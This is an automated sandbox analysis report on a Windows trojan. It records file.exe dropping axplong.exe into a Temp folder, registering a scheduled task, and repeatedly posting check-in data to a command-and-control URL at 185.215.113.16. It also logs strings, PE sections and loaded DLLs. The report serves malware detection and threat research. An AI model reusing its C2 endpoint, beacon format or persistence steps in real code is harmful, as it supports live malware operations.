r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332

Source: Joe Sandbox View

IP Address: 185.215.113.16 185.215.113.16

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 7_2_00D1BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

7_2_00D1BD60

Source: unknown

HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: axplong.exe, 00000007.00000002.2783076434.0000000000B69000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000007.00000002.2783076434.0000000000B27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
Source: axplong.exe, 00000007.00000002.2783076434.0000000000B69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php0
Source: axplong.exe, 00000007.00000002.2783076434.0000000000B69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php7
Source: axplong.exe, 00000007.00000002.2783076434.0000000000B69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpBg1&cm
Source: axplong.exe, 00000007.00000002.2783076434.0000000000B50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpG
Source: axplong.exe, 00000007.00000002.2783076434.0000000000B69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpN
Source: axplong.exe, 00000007.00000002.2783076434.0000000000B69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpO
Source: axplong.exe, 00000007.00000002.2783076434.0000000000B50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpS
Source: axplong.exe, 00000007.00000002.2783076434.0000000000B50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpcoded9
Source: axplong.exe, 00000007.00000002.2783076434.0000000000B50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpdeds
Source: axplong.exe, 00000007.00000002.2783076434.0000000000B50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpj
Source: axplong.exe, 00000007.00000002.2783076434.0000000000B50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpk
Source: axplong.exe, 00000007.00000002.2783076434.0000000000B69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpl
Source: axplong.exe, 00000007.00000002.2783076434.0000000000B50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
Source: axplong.exe, 00000007.00000002.2783076434.0000000000B50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodeda
Source: axplong.exe, 00000007.00000002.2783076434.0000000000B27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phps
Source: axplong.exe, 00000007.00000002.2783076434.0000000000B50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpw

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_00D14CF0	7_2_00D14CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_00D1E440	7_2_00D1E440
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_00D53068	7_2_00D53068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_00D47D83	7_2_00D47D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_00D14AF0	7_2_00D14AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_00D5765B	7_2_00D5765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_00D52BD0	7_2_00D52BD0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_00D5777B	7_2_00D5777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_00D56F09	7_2_00D56F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_00D58720	7_2_00D58720

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9973284230245232
Source: file.exe	Static PE information: Section: mrrxutca ZLIB complexity 0.9943481083086053
Source: axplong.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9973284230245232
Source: axplong.exe.0.dr	Static PE information: Section: mrrxutca ZLIB complexity 0.9943481083086053

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/3@0/1

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
